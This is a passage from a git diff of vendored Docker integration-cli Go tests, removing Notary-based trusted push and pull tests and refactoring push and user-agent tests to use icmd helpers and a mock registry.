- s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - if out, status := dockerCmd(c, "rmi", repoName); status != 0 { - c.Fatalf("Error removing image %q\n%s", repoName, out) - } - - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - - matches := digestRegex.FindStringSubmatch(out) - c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) - pullDigest := matches[1] - - imageID := inspectField(c, repoName, "Id") - - imageByDigest := repoName + "@" + pullDigest - byDigestID := inspectField(c, imageByDigest, "Id") - - c.Assert(byDigestID, checker.Equals, imageID) - - // rmi of tag should also remove the digest reference - dockerCmd(c, "rmi", repoName) - - _, err = inspectFieldWithError(imageByDigest, "Id") - c.Assert(err, checker.NotNil, check.Commentf("digest reference should have been removed")) - - _, err = inspectFieldWithError(imageID, "Id") - c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) -} - -func (s *DockerTrustSuite) TestTrustedPullReadsFromReleasesRole(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclireleasesdelegationpulling/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - - // Push with targets first, initializing the repo - dockerCmd(c, "tag", "busybox", targetName) - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - s.assertTargetInRoles(c, repoName, "latest", "targets") - - // Try pull, check 
we retrieve from targets role - pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "retrieving target for targets role") - - // Now we'll create the releases role, and try pushing and pulling - s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // try a pull, check that we can still pull because we can still read the - // old tag in the targets role - pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "retrieving target for targets role") - - // try a pull -a, check that it succeeds because we can still pull from the - // targets role - pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - - // Push, should sign with targets/releases - dockerCmd(c, "tag", "busybox", targetName) - pushCmd = exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases") - - // Try pull, check we retrieve from targets/releases role - pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(out, checker.Contains, "retrieving target for targets/releases role") - - // Create another delegation that we'll sign with - s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[1].Public) - s.notaryImportKey(c, repoName, "targets/other", s.not.keys[1].Private) - 
s.notaryPublish(c, repoName) - - dockerCmd(c, "tag", "busybox", targetName) - pushCmd = exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases", "targets/other") - - // Try pull, check we retrieve from targets/releases role - pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(out, checker.Contains, "retrieving target for targets/releases role") -} - -func (s *DockerTrustSuite) TestTrustedPullIgnoresOtherDelegationRoles(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclipullotherdelegation/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - - // We'll create a repo first with a non-release delegation role, so that when we - // push we'll sign it into the delegation role - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // Push should write to the delegation role, not targets - dockerCmd(c, "tag", "busybox", targetName) - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - s.assertTargetInRoles(c, repoName, "latest", "targets/other") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull - we should fail, since pull will only pull from the targets/releases - // role or the targets role - pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "No trust data for") - - // try a pull -a: we should fail since 
pull will only pull from the targets/releases - // role or the targets role - pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "No trusted tags for") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go index f750c12674..01ad829192 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go @@ -7,16 +7,14 @@ import ( "net/http" "net/http/httptest" "os" - "os/exec" - "path/filepath" "strings" "sync" - "time" "github.com/docker/distribution/reference" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) // Pushing an image to a private registry. 
@@ -134,13 +132,13 @@ func testPushEmptyLayer(c *check.C) { c.Assert(err, check.IsNil, check.Commentf("Could not open test tarball")) defer freader.Close() - importCmd := exec.Command(dockerBinary, "import", "-", repoName) - importCmd.Stdin = freader - out, _, err := runCommandWithOutput(importCmd) - c.Assert(err, check.IsNil, check.Commentf("import failed: %q", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "import", "-", repoName}, + Stdin: freader, + }).Assert(c, icmd.Success) // Now verify we can push it - out, _, err = dockerCmdWithError("push", repoName) + out, _, err := dockerCmdWithError("push", repoName) c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) } @@ -157,17 +155,16 @@ func (s *DockerSchema1RegistrySuite) TestPushEmptyLayer(c *check.C) { func testConcurrentPush(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"push1", "push2", "push3"} { repo := fmt.Sprintf("%v:%v", repoName, tag) - _, err := buildImage(repo, fmt.Sprintf(` + buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(` FROM busybox ENTRYPOINT ["/bin/echo"] ENV FOO foo ENV BAR bar CMD echo %s -`, repo), true) - c.Assert(err, checker.IsNil) +`, repo))) repos = append(repos, repo) } @@ -176,8 +173,8 @@ func testConcurrentPush(c *check.C) { for _, repo := range repos { go func(repo string) { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "push", repo)) - results <- err + result := icmd.RunCommand(dockerBinary, "push", repo) + results <- result.Error }(repo) } @@ -281,337 +278,6 @@ func (s *DockerSchema1RegistrySuite) TestCrossRepositoryLayerPushNotSupported(c c.Assert(out3, check.Equals, "hello world") } -func (s *DockerTrustSuite) TestTrustedPush(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitrusted/pushtest:latest", privateRegistryURL) - // tag the image and upload it to the 
private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // Try pull after push - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) - - // Assert that we rotated the snapshot key to the server by checking our local keystore - contents, err := ioutil.ReadDir(filepath.Join(cliconfig.ConfigDir(), "trust/private/tuf_keys", privateRegistryURL, "dockerclitrusted/pushtest")) - c.Assert(err, check.IsNil, check.Commentf("Unable to read local tuf key files")) - // Check that we only have 1 key (targets key) - c.Assert(contents, checker.HasLen, 1) -} - -func (s *DockerTrustSuite) TestTrustedPushWithEnvPasswords(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclienv/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmdWithPassphrases(pushCmd, "12345678", "12345678") - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // Try pull after push - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - 
c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushWithFailingServer(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitrusted/failingserver:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - // Using a name that doesn't resolve to an address makes this test faster - s.trustedCmdWithServer(pushCmd, "https://server.invalid:81/") - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("Missing error while running trusted push w/ no server")) - c.Assert(out, checker.Contains, "error contacting notary server", check.Commentf("Missing expected output on trusted push")) -} - -func (s *DockerTrustSuite) TestTrustedPushWithoutServerAndUntrusted(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitrusted/trustedandnot:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", "--disable-content-trust", repoName) - // Using a name that doesn't resolve to an address makes this test faster - s.trustedCmdWithServer(pushCmd, "https://server.invalid") - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push with no server and --disable-content-trust failed: %s\n%s", err, out)) - c.Assert(out, check.Not(checker.Contains), "Error establishing connection to notary repository", check.Commentf("Missing expected output on trusted push with --disable-content-trust:")) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExistingTag(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitag/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - - 
pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // Try pull after push - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExistingSignedTag(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclipushpush/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Do a trusted push - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // Do another trusted push - pushCmd = exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - dockerCmd(c, "rmi", repoName) - - // Try pull to ensure the double push did not break our ability to pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, 
check.Commentf("Error running trusted pull: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted pull with --disable-content-trust")) - -} - -func (s *DockerTrustSuite) TestTrustedPushWithIncorrectPassphraseForNonRoot(c *check.C) { - repoName := fmt.Sprintf("%v/dockercliincorretpwd/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - // Push with wrong passphrases - pushCmd = exec.Command(dockerBinary, "push", repoName) - s.trustedCmdWithPassphrases(pushCmd, "12345678", "87654321") - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with short targets passphrase: \n%s", out)) - c.Assert(out, checker.Contains, "could not find necessary signing keys", check.Commentf("Missing expected output on trusted push with short targets/snapsnot passphrase")) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExpiredSnapshot(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := fmt.Sprintf("%v/dockercliexpiredsnapshot/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, 
checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // Snapshots last for three years. This should be expired - fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) - - runAtDifferentDate(fourYearsLater, func() { - // Push with wrong passphrases - pushCmd = exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with expired snapshot: \n%s", out)) - c.Assert(out, checker.Contains, "repository out-of-date", check.Commentf("Missing expected output on trusted push with expired snapshot")) - }) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExpiredTimestamp(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppush/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // The timestamps expire in two weeks. 
Lets check three - threeWeeksLater := time.Now().Add(time.Hour * 24 * 21) - - // Should succeed because the server transparently re-signs one - runAtDifferentDate(threeWeeksLater, func() { - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with expired timestamp")) - }) -} - -func (s *DockerTrustSuite) TestTrustedPushWithReleasesDelegationOnly(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclireleasedelegationinitfirst/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) - s.notaryPublish(c, repoName) - - s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - // check to make sure that the target has been added to targets/releases and not targets - s.assertTargetInRoles(c, repoName, "latest", "targets/releases") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull after push - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - - pullCmd := exec.Command(dockerBinary, "pull", targetName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, 
check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushSignsAllFirstLevelRolesWeHaveKeysFor(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclimanyroles/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) - s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public) - s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public) - - // import everything except the third key - s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) - s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) - - s.notaryCreateDelegation(c, repoName, "targets/role1/subrole", s.not.keys[3].Public) - s.notaryImportKey(c, repoName, "targets/role1/subrole", s.not.keys[3].Private) - - s.notaryPublish(c, repoName) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // check to make sure that the target has been added to targets/role1 and targets/role2, and - // not targets (because there are delegations) or targets/role3 (due to missing key) or - // targets/role1/subrole (due to it being a second level delegation) - s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role2") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull after push - 
os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - - // pull should fail because none of these are the releases role - pullCmd := exec.Command(dockerBinary, "pull", targetName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushSignsForRolesWithKeysAndValidPaths(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclirolesbykeysandpaths/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public, "l", "z") - s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public, "x", "y") - s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public, "latest") - s.notaryCreateDelegation(c, repoName, "targets/role4", s.not.keys[3].Public, "latest") - - // import everything except the third key - s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) - s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) - s.notaryImportKey(c, repoName, "targets/role4", s.not.keys[3].Private) - - s.notaryPublish(c, repoName) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // check to make sure that the target has been added to targets/role1 and targets/role4, and - // not targets (because there are delegations) or targets/role2 (due to path restrictions) or - // targets/role3 (due to missing key) - s.assertTargetInRoles(c, repoName, "latest", 
"targets/role1", "targets/role4") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull after push - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - - // pull should fail because none of these are the releases role - pullCmd := exec.Command(dockerBinary, "pull", targetName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushDoesntSignTargetsIfDelegationsExist(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclireleasedelegationnotsignable/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) - s.notaryPublish(c, repoName) - - // do not import any delegations key - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("trusted push succeeded but should have failed:\n%s", out)) - c.Assert(out, checker.Contains, "no valid signing keys", - check.Commentf("Missing expected output on trusted push without keys")) - - s.assertTargetNotInRoles(c, repoName, "latest", "targets", "targets/role1") -} - func (s *DockerRegistryAuthHtpasswdSuite) TestPushNoCredentialsNoRetry(c *check.C) { repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) dockerCmd(c, "tag", "busybox", repoName) @@ -675,15 +341,16 @@ func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponse } func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseError(c *check.C) { - ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 4) + ts := 
getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 3) defer ts.Close() s.setupRegistryWithTokenService(c, ts.URL) repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) dockerCmd(c, "tag", "busybox", repoName) out, _, err := dockerCmdWithError("push", repoName) c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Retrying") - c.Assert(out, checker.Not(checker.Contains), "Retrying in 15") + // TODO: isolate test so that it can be guaranteed that the 503 will trigger xfer retries + //c.Assert(out, checker.Contains, "Retrying") + //c.Assert(out, checker.Not(checker.Contains), "Retrying in 15") split := strings.Split(out, "\n") c.Assert(split[len(split)-2], check.Equals, "toomanyrequests: out of tokens") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go index fb9a66a541..7ee3c3d1ba 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go @@ -2,9 +2,12 @@ package main import ( "fmt" + "io/ioutil" "net/http" + "os" "regexp" + "github.com/docker/docker/internal/test/registry" "github.com/go-check/check" ) @@ -46,9 +49,14 @@ func regexpCheckUA(c *check.C, ua string) { c.Assert(bMatchUpstreamUA, check.Equals, true, check.Commentf("(Upstream) Docker Client User-Agent malformed")) } -func registerUserAgentHandler(reg *testRegistry, result *string) { - reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { +// registerUserAgentHandler registers a handler for the `/v2/*` endpoint. +// Note that a 404 is returned to prevent the client to proceed. +// We are only checking if the client sent a valid User Agent string along +// with the request. 
+func registerUserAgentHandler(reg *registry.Mock, result *string) { + reg.RegisterHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(404) + w.Write([]byte(`{"errors":[{"code": "UNSUPPORTED","message": "this is a mock registry"}]}`)) var ua string for k, v := range r.Header { if k == "User-Agent" { @@ -61,60 +69,35 @@ func registerUserAgentHandler(reg *testRegistry, result *string) { // TestUserAgentPassThrough verifies that when an image is pulled from // a registry, the registry should see a User-Agent string of the form -// [docker engine UA] UptreamClientSTREAM-CLIENT([client UA]) +// [docker engine UA] UpstreamClientSTREAM-CLIENT([client UA]) func (s *DockerRegistrySuite) TestUserAgentPassThrough(c *check.C) { - var ( - buildUA string - pullUA string - pushUA string - loginUA string - ) - - buildReg, err := newTestRegistry(c) - c.Assert(err, check.IsNil) - registerUserAgentHandler(buildReg, &buildUA) - buildRepoName := fmt.Sprintf("%s/busybox", buildReg.hostport) + var ua string - pullReg, err := newTestRegistry(c) + reg, err := registry.NewMock(c) + defer reg.Close() c.Assert(err, check.IsNil) - registerUserAgentHandler(pullReg, &pullUA) - pullRepoName := fmt.Sprintf("%s/busybox", pullReg.hostport) + registerUserAgentHandler(reg, &ua) + repoName := fmt.Sprintf("%s/busybox", reg.URL()) - pushReg, err := newTestRegistry(c) - c.Assert(err, check.IsNil) - registerUserAgentHandler(pushReg, &pushUA) - pushRepoName := fmt.Sprintf("%s/busybox", pushReg.hostport) + s.d.StartWithBusybox(c, "--insecure-registry", reg.URL()) - loginReg, err := newTestRegistry(c) - c.Assert(err, check.IsNil) - registerUserAgentHandler(loginReg, &loginUA) - - err = s.d.Start( - "--insecure-registry", buildReg.hostport, - "--insecure-registry", pullReg.hostport, - "--insecure-registry", pushReg.hostport, - "--insecure-registry", loginReg.hostport, - "--disable-legacy-registry=true") + tmp, err := ioutil.TempDir("", "integration-cli-") c.Assert(err, check.IsNil) + 
defer os.RemoveAll(tmp) - dockerfileName, cleanup1, err := makefile(fmt.Sprintf("FROM %s", buildRepoName)) + dockerfile, err := makefile(tmp, fmt.Sprintf("FROM %s", repoName)) c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup1() - s.d.Cmd("build", "--file", dockerfileName, ".") - regexpCheckUA(c, buildUA) - s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", loginReg.hostport) - regexpCheckUA(c, loginUA) + s.d.Cmd("build", "--file", dockerfile, tmp) + regexpCheckUA(c, ua) - s.d.Cmd("pull", pullRepoName) - regexpCheckUA(c, pullUA) + s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.URL()) + regexpCheckUA(c, ua) - dockerfileName, cleanup2, err := makefile(`FROM scratch - ENV foo bar`) - c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup2() - s.d.Cmd("build", "-t", pushRepoName, "--file", dockerfileName, ".") + s.d.Cmd("pull", repoName) + regexpCheckUA(c, ua) - s.d.Cmd("push", pushRepoName) - regexpCheckUA(c, pushUA) + s.d.Cmd("tag", "busybox", repoName) + s.d.Cmd("push", repoName) + regexpCheckUA(c, ua) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go deleted file mode 100644 index 373d614b5e..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go +++ /dev/null @@ -1,138 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/stringid" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestRenameStoppedContainer(c *check.C) { - out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") - - cleanedContainerID := strings.TrimSpace(out) - dockerCmd(c, "wait", cleanedContainerID) - - name := inspectField(c, cleanedContainerID, "Name") - 
